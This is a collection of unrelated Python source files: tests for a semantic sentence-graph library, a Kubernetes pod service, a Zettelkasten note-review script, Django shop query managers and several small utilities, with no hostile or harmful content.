'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'was_used': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}}},
'type': 'dependency'},
('tree1-semantics-pred-20', 'tree1-semantics-arg-23'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-3'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_location': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_possession': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_state': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'change_of_state_continuous': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'existed_after': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'existed_before': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'existed_during': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'instigation': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'partitive': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'sentient': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'volition': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'was_for_benefit': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}},
'was_used': {'confidence': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 1},
'value': {'protoroles-annotator-34': 0,
'protoroles-annotator-44': 4}}},
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-0'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-addressee'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-author'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'}}
@pytest.fixture
def graph_syntax_edges():
return {('tree1-root-0', 'tree1-syntax-7'): {'deprel': 'root',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-10'): {'deprel': 'aux',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-13'): {'deprel': 'dobj',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-15'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-16'): {'deprel': 'punct',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-20'): {'deprel': 'advcl',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-8'): {'deprel': 'mark',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-11', 'tree1-syntax-9'): {'deprel': 'nsubj',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-13', 'tree1-syntax-12'): {'deprel': 'nummod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-15', 'tree1-syntax-14'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-17'): {'deprel': 'mark',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-18'): {'deprel': 'expl',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-19'): {'deprel': 'aux',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-20', 'tree1-syntax-23'): {'deprel': 'nsubj',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-23', 'tree1-syntax-21'): {'deprel': 'det',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-23', 'tree1-syntax-22'): {'deprel': 'amod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-23', 'tree1-syntax-26'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-26', 'tree1-syntax-24'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-26', 'tree1-syntax-25'): {'deprel': 'det',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-26', 'tree1-syntax-28'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-28', 'tree1-syntax-27'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-3', 'tree1-syntax-1'): {'deprel': 'det',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-3', 'tree1-syntax-2'): {'deprel': 'compound',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-3', 'tree1-syntax-6'): {'deprel': 'nmod',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-6', 'tree1-syntax-4'): {'deprel': 'case',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-6', 'tree1-syntax-5'): {'deprel': 'compound',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-7', 'tree1-syntax-11'): {'deprel': 'ccomp',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-7', 'tree1-syntax-29'): {'deprel': 'punct',
'domain': 'syntax',
'type': 'dependency'},
('tree1-syntax-7', 'tree1-syntax-3'): {'deprel': 'nsubj',
'domain': 'syntax',
'type': 'dependency'}}
@pytest.fixture
def graph_query_results():
return {('tree1-semantics-pred-7', 'tree1-semantics-arg-3'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 1.0,
'value': 1.3526},
'change_of_location': {'confidence': 0.272,
'value': -0.0922},
'change_of_possession': {'confidence': 0.7724,
'value': -0.0},
'change_of_state': {'confidence': 0.2067,
'value': -0.0548},
'change_of_state_continuous': {'confidence': 1.0,
'value': -0.0},
'existed_after': {'confidence': 1.0,
'value': 1.3527},
'existed_before': {'confidence': 1.0,
'value': 1.3527},
'existed_during': {'confidence': 1.0,
'value': 1.3557},
'instigation': {'confidence': 1.0,
'value': 1.3557},
'partitive': {'confidence': 0.1148,
'value': -0.0018},
'sentient': {'confidence': 1.0,
'value': 1.354},
'volition': {'confidence': 1.0,
'value': 1.3545},
'was_for_benefit': {'confidence': 0.1976,
'value': -0.0504},
'was_used': {'confidence': 0.4373,
'value': -0.0207}},
'type': 'dependency'}}
class TestUDSSentenceGraph:
def test_sentence(self, normalized_sentence_graph,
raw_sentence_graph, graph_sentence):
assert normalized_sentence_graph.sentence == graph_sentence
assert raw_sentence_graph.sentence == graph_sentence
def test_syntax_nodes(self, normalized_sentence_graph, raw_sentence_graph, graph_syntax_nodes):
assert normalized_sentence_graph.syntax_nodes == graph_syntax_nodes
assert raw_sentence_graph.syntax_nodes == graph_syntax_nodes
def test_normalized_semantics_nodes(self, normalized_sentence_graph,
graph_normalized_semantics_nodes):
assert normalized_sentence_graph.semantics_nodes ==\
graph_normalized_semantics_nodes
def test_raw_semantics_nodes(self, raw_sentence_graph,
graph_raw_semantics_nodes):
assert raw_sentence_graph.semantics_nodes ==\
graph_raw_semantics_nodes
def test_syntax_edges(self, normalized_sentence_graph,
raw_sentence_graph, graph_syntax_edges):
assert normalized_sentence_graph.syntax_edges() == graph_syntax_edges
assert raw_sentence_graph.syntax_edges() == graph_syntax_edges
def test_normalized_semantics_edges(self, normalized_sentence_graph,
graph_normalized_semantics_edges):
assert normalized_sentence_graph.semantics_edges() ==\
graph_normalized_semantics_edges
def test_raw_semantics_edges(self, raw_sentence_graph, graph_raw_semantics_edges):
assert raw_sentence_graph.semantics_edges() ==\
graph_raw_semantics_edges
def test_maxima(self, normalized_sentence_graph, raw_sentence_graph):
normalized_sentence_graph.maxima() == ['tree1-semantics-pred-root']
raw_sentence_graph.maxima() == ['tree1-semantics-pred-root']
noroot_normalized = [nid for nid in normalized_sentence_graph.nodes
if nid != 'tree1-semantics-pred-root']
noroot_raw = [nid for nid in raw_sentence_graph.nodes
if nid != 'tree1-semantics-pred-root']
assert normalized_sentence_graph.maxima(noroot_normalized) == ['tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
assert raw_sentence_graph.maxima(noroot_raw) == ['tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
noperformative_normalized = [nid for nid in normalized_sentence_graph.nodes
if nid not in ['tree1-semantics-pred-root',
'tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']]
noperformative_raw = [nid for nid in raw_sentence_graph.nodes
if nid not in ['tree1-semantics-pred-root',
'tree1-semantics-arg-0',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']]
assert normalized_sentence_graph.maxima(noperformative_normalized) == ['tree1-root-0',
'tree1-semantics-pred-7',
'tree1-semantics-pred-20']
assert raw_sentence_graph.maxima(noperformative_raw) == ['tree1-root-0',
'tree1-semantics-pred-7',
'tree1-semantics-pred-20']
def test_minima(self, normalized_sentence_graph, raw_sentence_graph):
normalized_sentence_graph.minima() == ['tree1-syntax-1',
'tree1-syntax-2',
'tree1-syntax-4',
'tree1-syntax-5',
'tree1-syntax-8',
'tree1-syntax-9',
'tree1-syntax-10',
'tree1-syntax-12',
'tree1-syntax-14',
'tree1-syntax-16',
'tree1-syntax-17',
'tree1-syntax-18',
'tree1-syntax-19',
'tree1-syntax-21',
'tree1-syntax-22',
'tree1-syntax-24',
'tree1-syntax-25',
'tree1-syntax-27',
'tree1-syntax-29',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
raw_sentence_graph.minima() == ['tree1-syntax-1',
'tree1-syntax-2',
'tree1-syntax-4',
'tree1-syntax-5',
'tree1-syntax-8',
'tree1-syntax-9',
'tree1-syntax-10',
'tree1-syntax-12',
'tree1-syntax-14',
'tree1-syntax-16',
'tree1-syntax-17',
'tree1-syntax-18',
'tree1-syntax-19',
'tree1-syntax-21',
'tree1-syntax-22',
'tree1-syntax-24',
'tree1-syntax-25',
'tree1-syntax-27',
'tree1-syntax-29',
'tree1-semantics-arg-author',
'tree1-semantics-arg-addressee']
def test_query(self, normalized_sentence_graph, graph_query_results):
querystr = """
SELECT ?edge
WHERE { ?node ?edge ?arg ;
<domain> <semantics> ;
<type> <predicate> ;
<pred-particular> ?predparticular
FILTER ( ?predparticular > 0 ) .
?arg <domain> <semantics> ;
<type> <argument> ;
<arg-particular> ?argparticular
FILTER ( ?argparticular > 0 ) .
{ ?edge <volition> ?volition
FILTER ( ?volition > 0 )
} UNION
{ ?edge <sentient> ?sentient
FILTER ( ?sentient > 0 )
}
}
"""
assert normalized_sentence_graph.query(querystr, query_type='edge') == graph_query_results
def test_to_from_dict(self, normalized_sentence_graph, raw_sentence_graph):
in_then_out = normalized_sentence_graph.from_dict(normalized_sentence_graph.to_dict(), 'tree1').to_dict()
assert normalized_sentence_graph.to_dict() == in_then_out
assert in_then_out == normalized_sentence_graph.from_dict(in_then_out, 'tree1').to_dict()
def test_constructing_rdf_for_graph_with_raw_annotations_fails(raw_sentence_graph):
graph = raw_sentence_graph
assert hasattr(graph, '_rdf') == False # RDF not yet built
# attempt to build RDF
with pytest.raises(TypeError):
graph.rdf
|
11546289
|
from setuptools import setup
setup(
name="aorist_recipes",
version="0.0.1",
packages=["aorist_recipes"],
zip_safe=False,
include_package_data=True,
package_data={"aorist_recipes": ["aorist_recipes/*"],},
long_description="""
Recipes for aorist package.
""",
long_description_content_type="text/x-rst"
)
|
11546308
|
from __future__ import annotations
import asyncio
import typing as t
from aiohttp import StreamReader
from sentry_sdk import capture_exception
from ...exceptions import K8SEmptyPodIp
from ..log import logger
from ..pod_event import PodEventService
from ..task_runner import TaskRunnerService
from .client import K8sClient
if t.TYPE_CHECKING:
from kubernetes_asyncio.client import V1Pod, V1Status # type: ignore
class K8sService:
def __init__(self,
k8s_client: K8sClient,
namespace: str,
pod_event_service: PodEventService,
task_runner_service: TaskRunnerService,
) -> None:
self.k8s_client = k8s_client
self.namespace = namespace
self.pod_event_service = pod_event_service
self.task_runner_service = task_runner_service
async def run_background_tasks(self) -> None:
await self.task_runner_service.run_in_background(self.watch_ready_pods)
async def api_is_available(self) -> bool:
try:
await self.k8s_client.get_api_versions()
except Exception as e:
logger.exception(e)
return False
else:
return True
async def get_pod(self, name: str) -> V1Pod:
return await self.k8s_client.get_pod(namespace=self.namespace, name=name)
async def create_pod(self, spec: t.Dict[str, t.Any]) -> V1Pod:
return await self.k8s_client.create_pod(namespace=self.namespace, spec=spec)
async def delete_pod(self, name: str) -> V1Status:
return await self.k8s_client.delete_pod(namespace=self.namespace, name=name)
async def watch_ready_pods(self) -> None:
while True:
try:
async for pod_name in self.k8s_client.watch_pod_ready_events(namespace=self.namespace):
# pod_name is unique
# We set generateName property for pod manifest, so K8s guarantees it will be unique
event = self.pod_event_service.get_or_create_event(pod_name)
event.set()
except asyncio.CancelledError:
raise
except Exception as e:
logger.exception(e)
capture_exception(e)
await asyncio.sleep(1) # here we are polling k8s API with a certain interval
async def wait_until_pod_is_ready(self, pod_name: str) -> None:
event = self.pod_event_service.get_or_create_event(pod_name)
await event.wait()
self.pod_event_service.clean(pod_name)
async def get_pod_logs_stream(self, name: str) -> StreamReader:
return await self.k8s_client.get_pod_logs_stream(namespace=self.namespace, name=name)
@staticmethod
def get_node_name(pod: V1Pod) -> str:
return pod.spec.node_name
@staticmethod
def get_pod_ip(pod: V1Pod) -> str:
pod_ip = pod.status.pod_ip
# In some cases K8s does not return pod IP
# Need a retry on the tests side
if pod_ip is None:
raise K8SEmptyPodIp("Pod does not have an IP")
return pod_ip
@staticmethod
def get_pod_name(pod: V1Pod) -> str:
return pod.metadata.name
@staticmethod
def _get_browser_env(pod: V1Pod, env_name: str) -> t.Optional[str]:
for container in pod.spec.containers:
if container.name != 'browser' or not container.env:
continue
for env in container.env:
if env.name == env_name:
return env.value
return None
@classmethod
def get_browser_timezone(cls, pod: V1Pod) -> str:
# default https://aerokube.com/selenoid/latest/#_setting_timezone
return cls._get_browser_env(pod, 'TZ') or 'UTC'
@classmethod
def get_browser_vnc_enabled(cls, pod: V1Pod) -> bool:
# default https://github.com/aerokube/selenoid-images/blob/master/selenium/chrome/entrypoint.sh#L60
return cls._get_browser_env(pod, 'ENABLE_VNC') == 'true'
@classmethod
def get_browser_screen_resolution(cls, pod: V1Pod) -> str:
# default https://github.com/aerokube/selenoid-images/blob/master/selenium/chrome/entrypoint.sh#L2
return cls._get_browser_env(pod, 'SCREEN_RESOLUTION') or '1920x1080x24'
|
11546310
|
import datetime
import os
import pickle
import platform
import subprocess
import sys
from argparse import ArgumentParser
from collections import Counter
from math import ceil, floor, sqrt
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
plt.rcParams["toolbar"] = "None"
NOW = datetime.datetime.now()
def plot_age_heatmap(ages_mins):
aspect_ratio = 16 / 9
# Result of minimizing number of rows for min||nrows^2 * ncols - len||_2^2
# Could be improved by cleverly chosing if we ceil rows or cols, depending
# on which yields better coverage (this is safe option).
num_rows = sqrt(len(ages_mins) * aspect_ratio + 4) / aspect_ratio
num_cols = aspect_ratio * num_rows
rounding_ops = [(ceil, floor), (floor, ceil), (ceil, ceil)]
coverage_errors = [
row_op(num_rows) * col_op(num_cols) - len(ages_mins)
for row_op, col_op in rounding_ops
]
coverage_errors_positive = [error if error >= 0 else np.nan for error in coverage_errors]
rounding_choice = np.nanargmin(coverage_errors_positive)
row_op, col_op = rounding_ops[rounding_choice]
num_rows = row_op(num_rows)
num_cols = col_op(num_cols)
padded_len = num_cols * num_rows
padded_ages_mins = np.array([np.nan] * padded_len)
padded_ages_mins[0 : len(ages_mins)] = ages_mins
padded_ages_days = np.round(padded_ages_mins / (60 * 24))
mode = Counter(padded_ages_days).most_common(1)[0][0]
fig, ax = plt.subplots(
num=f"{len(ages_mins)} Zettels - Median Age {np.median(ages_mins/(60*24)):.0f} days - Mode {mode:.0f} days",
)
ax.tick_params(left=False, bottom=False, labelbottom=False, labelleft=False)
ax.set_title("Days Since Last Visit To Zettel")
im = ax.imshow(
np.reshape([padded_ages_days], (num_rows, num_cols)), cmap="plasma_r",
)
cax = make_axes_locatable(ax).append_axes("right", size="5%", pad=0.1)
fig.colorbar(im, cax=cax)
fig.tight_layout()
plt.show()
def get_file_suffix(filepath):
_, suffix = os.path.splitext(filepath)
return suffix
def get_selection_probabilities(ages, importance_function):
"""
Returns the probability of a Zettel being selected. This is proportional
to the Zettels age.
If importance_function == linear, that means if a Zettel is twice as old as another,
it is also twice as likely to be picked.
If importance_function == quadratic, that means a Zettel twice as old as another is
four times as likely to be picked. This leads to faster getting to know the old ones.
If importance_function == log, that means a Zettel twice as old as another is only
a little bit more likely to be opened for review. This is kind of like having a
uniform probability of picking notes, with the exception of new notes.
"""
ages = np.array(ages)
if importance_function == "linear":
ages_weighted = ages
elif importance_function == "quadratic":
ages_weighted = np.power(ages, 2)
elif importance_function == "log":
ages_weighted = np.log(ages + 1) # age could be below 1
else:
raise LookupError(f"Unknown importance function: {importance_function}")
total_age = np.sum(ages_weighted)
if total_age == 0:
return np.ones_like(ages_weighted)
return ages_weighted / total_age
def main(
folder, numzettels, picklename, suffixes, visualize_only, importance_fun,
):
os.chdir(folder)
zettels = os.listdir()
zettels = [
zett
for zett in zettels
if os.path.isfile(zett) and get_file_suffix(zett) in suffixes
]
if numzettels > len(zettels):
numzettels = len(zettels)
if os.path.isfile(picklename):
with open(picklename, "rb") as fh:
zettel_dates = pickle.load(fh)
zettel_dates = {
zett_name: zett_date
for zett_name, zett_date in zettel_dates.items()
if zett_name in zettels
}
age_in_mins = {
zettel: (NOW - last_opened).total_seconds() // 60
for zettel, last_opened in zettel_dates.items()
}
else:
print(
"Couldn't find zettelwarmer database at {}. Making new one.".format(
os.path.realpath(picklename)
),
file=sys.stderr,
)
with open(picklename, "wb+") as fh:
zettel_dates = {}
age_in_mins = {}
pickle.dump(zettel_dates, fh)
oldest_age = -1
if len(age_in_mins.values()) > 0:
oldest_age = np.max(list(age_in_mins.values()))
for zett in zettels:
if zett not in age_in_mins:
age_in_mins[zett] = oldest_age
ages = np.array([age_in_mins[zett] for zett in zettels])
selection_probabilities = get_selection_probabilities(
ages, importance_function=importance_fun
)
selection_probabilities /= np.sum(selection_probabilities)
sample_zettels = np.random.choice(
zettels, size=numzettels, replace=False, p=selection_probabilities
)
plot_age_heatmap(ages)
if visualize_only:
print("Ok, not opening anything...")
return
if platform.system() == "Darwin":
open_cmd = "open"
elif platform.system() == "Linux":
open_cmd = "xdg-open"
elif platform.system() == "Windows":
open_cmd = ""
print("You're apparently using windows. I don't know if the file opening works. Please tell me if it did (please make an issue on github).")
else:
raise OSError(f"Don't know how to open files for your operating system: {platform.system()}.")
for zettel in sample_zettels:
zettel_dates[zettel] = datetime.datetime.now()
subprocess.run([open_cmd, zettel])
with open(picklename, "wb+") as fh:
pickle.dump(zettel_dates, fh)
if __name__ == "__main__":
parser = ArgumentParser(
description="Tool to revisit random Zettels from your collection. Gives more weight to old Zettels that you haven't seen in a while."
)
parser.add_argument(
"-f",
"--folder",
help="Path to folder with all the zettels in it. Defaults to current directory.",
default=".",
)
parser.add_argument(
"-n",
"--numzettels",
help="Number of Zettels to pick and open.",
default=5,
type=int,
)
parser.add_argument(
"-if",
"--importance-fun",
help="Function of age, used to weight note-picking probability. Possible values are linear, quadratic, log",
default="quadratic",
)
parser.add_argument(
"-s",
"--suffixes",
help="List of valid suffixes to consider as Zettel files. Defaults to .md",
nargs="+",
default=[".md"],
)
parser.add_argument(
"-p",
"--picklename",
help="Name of the pickle file to save file ages into. Will be saved in the Zettel folder.",
default="zettelwarmer.pickle",
)
parser.add_argument(
"-vo",
"--visualize-only",
help="Do not open or modify anything, only show the heatmap.",
action="store_true",
)
args = parser.parse_args()
params = vars(args)
main(**params)
|
11546436
|
import enum
import numpy as np
from absl import flags
from gpflow import default_float
from pssgp.experiments.common import ModelEnum, CovarianceEnum
from pssgp.toymodels import sinu, comp_sinu, rect, obs_noise
class DataEnum(enum.Enum):
SINE = "SINE"
COMPOSITE_SINE = "COMPOSITE_SINE"
RECT = "RECT"
FLAGS = flags.FLAGS
flags.DEFINE_string('model', ModelEnum.SSGP.value, 'Select model to run. Options are gp, ssgp, and pssgp.')
flags.DEFINE_string('cov', CovarianceEnum.Matern32.value, 'Covariance function.')
flags.DEFINE_string('data_model', DataEnum.SINE.value, 'What is the model for the data.')
flags.DEFINE_string('dtype', "float32", 'GPFLOW default float type.')
flags.DEFINE_integer('rbf_order', 6, 'Order of ss-RBF approximation.', lower_bound=1)
flags.DEFINE_integer('rbf_balance_iter', 10, 'Iterations of RBF balancing.', lower_bound=1)
flags.DEFINE_integer('qp_order', 6, 'Order of ss-quasiperiodic approximation.', lower_bound=1)
flags.DEFINE_float('noise_variance', 0.5, 'Variance of the noise.', lower_bound=1e-4)
def get_data(seed, n_training, n_pred):
dtype = default_float()
t = np.linspace(0, 4, n_training, dtype=dtype)
t_pred = np.linspace(0, 4, n_pred, dtype=dtype)
data_model = DataEnum(FLAGS.data_model)
if data_model == DataEnum.SINE:
data_fun = sinu
elif data_model == DataEnum.COMPOSITE_SINE:
data_fun = comp_sinu
elif data_model == DataEnum.RECT:
data_fun = rect
else:
raise ValueError("")
ft = data_fun(t)
ft_pred = data_fun(t_pred)
y = obs_noise(ft, FLAGS.noise_variance, seed)
return t.reshape(-1, 1), ft.reshape(-1, 1), t_pred.reshape(-1, 1), ft_pred.reshape(-1, 1), y.reshape(-1, 1)
|
11546438
|
from twarc import Twarc2, expansions
import json
# Replace your bearer token below
client = Twarc2(bearer_token="<PASSWORD>")
def main():
# List of user IDs to lookup, add the ones you would like to lookup
users = ['2244994945', '783214', '6253282']
# The user_lookup function gets the hydrated user information for specified users
lookup = client.user_lookup(users=users)
for page in lookup:
result = expansions.flatten(page)
for user in result:
# Here we are printing the full Tweet object JSON to the console
print(json.dumps(user))
if __name__ == "__main__":
main()
|
11546456
|
from . import base
from .base import model
from . import hotelling
from .hotelling import Hotelling
from . import sst
from .sst import SST
|
11546467
|
from rfl_net.network import Network
import config
class XZNet(Network):
def setup(self):
(self.feed('input')
.conv(11, 11, 96, 2, 2, padding='VALID', name='conv1', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn1')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool1')
.conv(5, 5, 256, 1, 1, padding='VALID', name='conv2', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn2')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool2')
.conv(3, 3, 384, 1, 1, padding='VALID', name='conv3', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn3')
.conv(3, 3, 384, 1, 1, padding='VALID', name='conv4', relu=False)
.bn(is_train=self.is_train, relu=True, name='bn4')
.conv(3, 3, 256, 1, 1, padding='VALID', name='conv5', relu=False)
.bn(is_train=self.is_train, relu=False, name='bn5'))
class FilterNet(Network):
def setup(self):
(self.feed('output')
.conv(1, 1, config.output_size, 1, 1, padding='SAME', name='conv6', relu=False))
class ConvXZNet(Network):
def setup(self):
(self.feed('z_gf', 'x_output')
.batch_conv(name='response'))
|
11546490
|
from __future__ import annotations
import enum
__all__ = ("MessageType",)
class MessageType(enum.IntEnum):
DEFAULT = 0
RECIPIENT_ADD = 1
RECIPIENT_REMOVE = 2
CALL = 3
CHANNEL_NAME_CHANGE = 4
CHANNEL_ICON_CHANGE = 5
CHANNEL_PINNED_MESSAGE = 6
GUILD_MEMBER_JOIN = 7
USER_PREMIUM_GUILD_SUBSCRIPTION = 8
USER_PREMIUM_GUILD_SUBSCRIPTION_TIER_1 = 9
USER_PREMIUM_GUILD_SUBSCRIPTION_TIER_2 = 10
USER_PREMIUM_GUILD_SUBSCRIPTION_TIER_3 = 11
CHANNEL_FOLLOW_ADD = 12
GUILD_DISCOVERY_DISQUALIFIED = 14
GUILD_DISCOVERY_REQUALIFIED = 15
GUILD_DISCOVERY_GRACE_PERIOD_INITIAL_WARNING = 16
GUILD_DISCOVERY_GRACE_PERIOD_FINAL_WARNING = 17
THREAD_CREATED = 18
REPLY = 19
CHAT_INPUT_COMMAND = 20
THREAD_STARTER_MESSAGE = 21
GUILD_INVITE_REMINDER = 22
CONTEXT_MENU_COMMAND = 23
|
11546500
|
import datetime
import re
from django import http
from django.contrib import messages
from django.core import exceptions
from django.db.models import (Avg, Case, Count, F, Q, QuerySet, Sum, When,
fields)
from django.db.models.functions import TruncMonth
from shop import utilities
class CollectionManager(QuerySet):
def active_products(self, collection_name):
collection = self.get(name__iexact=collection_name)
return collection.product_set.filter(active=True)
def products_between_price(self, collection_name, a, b):
products = self.active_products(collection_name)
price_between_a_and_b = Q(price_pre_tax__gt=a) & Q(price_pre_tax__lt=b)
return products.filter(price_between_a_and_b)
class ProductManager(QuerySet):
def active_products(self):
return self.filter(active=True, private=False)
def private_products(self):
return self.filter(private=True)
def count_products_by_collection(self):
"""Returns the count of products by collection"""
products = self.values('collection__name')
items = products.annotate(count_of=Count('name'))
return [[item['collection__name'] for item in items], [item['count_of'] for item in items]]
def average_price_by_collection(self):
"""Returns the average price by collection"""
products = self.values('collection__name')
return products.order_by('collection__name')\
.annotate(average_price=Count('price_pre_tax'))
def search_product(self, searched_item):
"""
Allows the user to search for a product on
the website
"""
qfunctions = Q(name__icontains=searched_item) | Q(
collection__name__icontains=searched_item)
queryset = self.filter(qfunctions).filter(active=True)
if queryset.exists():
return queryset
return []
def advanced_search(self, searched_terms):
"""
This is an advanced search feature for the dashboard
for example
"""
queryset = self.all()
if ':' in searched_terms:
key, value = searched_terms.split(':')
if key == 'state':
if value == 'actif' \
or value == 'true' \
or value == 'True':
return queryset.filter(active=True)
elif value == 'inactif' \
or value == 'false' \
or value == 'False':
return queryset.filter(active=False)
if searched_terms.startswith('-'):
searched_terms = re.search(r'^-(?:\s?)(.*)', searched_terms).group(1)
searched_terms = ~Q(name__icontains=searched_terms) & ~Q(reference__icontains=searched_terms) \
& ~Q(collection__name__icontains=searched_terms)
else:
searched_terms = Q(name__icontains=searched_terms) | Q(reference__icontains=searched_terms) \
| Q(collection__name__icontains=searched_terms)
return queryset.filter(searched_terms)
def to_be_published_today(self):
"""Return a queryset of products that are
not published on the current date"""
current_date = datetime.datetime.now()
products = self.filter(to_be_published_on__date=current_date, active=False)
return products
def out_of_stock(self, threshold=5):
"""Return a queryset of products that are
out of stock or nearly out of stock"""
logic = (
Q(active=True) &
Q(monitor_quantity=True) &
Q(quantity__lte=threshold)
)
return self.filter(logic)
##############
#
# DASHBOARD
#
##############
class BaseStatistics(QuerySet):
def total_count(self):
return self.all().count()
|
11546541
|
import os,sys
class StartProgram(object):
def __init__(self):
pass
@staticmethod
def start(proto_path, program):
list_dirs = os.listdir(proto_path)
for proto in list_dirs:
if not proto.endswith((".exe")):
continue
if program and proto == program:
if proto_path.endswith("/"):
protofile = proto_path + proto
else:
protofile = os.path.join(proto_path, proto)
# print(protofile)
os.startfile(protofile)
if __name__ == "__main__":
workPath = os.path.abspath('..')
binPath = workPath +"\\bin\\"
StartProgram.start(binPath, "MasterServer.exe")
StartProgram.start(binPath, "GateServer.exe")
StartProgram.start(binPath, "ChatServer.exe")
StartProgram.start(binPath, "MyClient.exe")
|
11546552
|
import unittest
from exporters.writers import MailWriter
from .utils import meta
import copy
class FakeMailWriter(MailWriter):
def __init__(self, *args, **kwargs):
self.send_called_number = 0
super(FakeMailWriter, self).__init__(*args, **kwargs)
def _write_mail(self, dump_path, group_key):
self.send_called_number += 1
WRITER_CONFIG = {
'emails': [],
'subject': 'test',
'from': 'test',
'access_key': 'test',
'secret_key': 'test'
}
class MailWriterTest(unittest.TestCase):
def get_writer_config(self, **kwargs):
config = copy.deepcopy(WRITER_CONFIG)
config.update(**kwargs)
return {'options': config}
def setUp(self):
self.batch_path = 'some_path'
def test_write_no_items(self):
writer_config = self.get_writer_config()
writer = FakeMailWriter(writer_config, meta())
writer.write(self.batch_path, [])
self.assertEqual(writer.send_called_number, 0)
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
self.assertEqual(writer.send_called_number, 1)
writer.close()
def test_file_name_none_compression(self):
writer_config = self.get_writer_config(file_name='some_file_', compression='none')
print writer_config
writer = FakeMailWriter(
writer_config, meta())
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
